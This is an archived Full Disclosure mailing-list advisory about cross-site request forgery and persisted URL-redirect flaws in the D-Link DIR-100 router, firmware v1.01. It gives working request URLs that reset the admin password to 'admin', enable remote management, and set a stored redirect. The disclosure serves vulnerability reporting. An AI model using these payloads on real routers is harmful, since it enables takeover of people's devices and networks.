[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] New vulnerabilities in D-Link DIR-100
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] New vulnerabilities in D-Link DIR-100
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Wed, 31 Jan 2018 19:03:13 +0200
Hello list!
There are Cross-Site Request Forgery and URL Redirector Abuse
vulnerabilities in D-Link DIR-100. This is my second advisory for DIR-100.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DIR-100, Firmware v1.01. All other
versions also must be vulnerable.
----------
Details:
----------
Cross-Site Request Forgery (WASC-09):
Change admin's password:
http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin
Turn on Remote Management:
http://site/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80
CSRF attack to change admin's password and turn on Remote Management:
http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin&SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80
URL Redirector Abuse (WASC-38):
http://site/Tools/vs.htm?location=http://www.google.com
This is Persisted Redirector attack. After setting of an address in location
parameter it saves and later on it's possible to redirect only by visiting
of the page http://site/Tools/vs.htm.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/8021/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/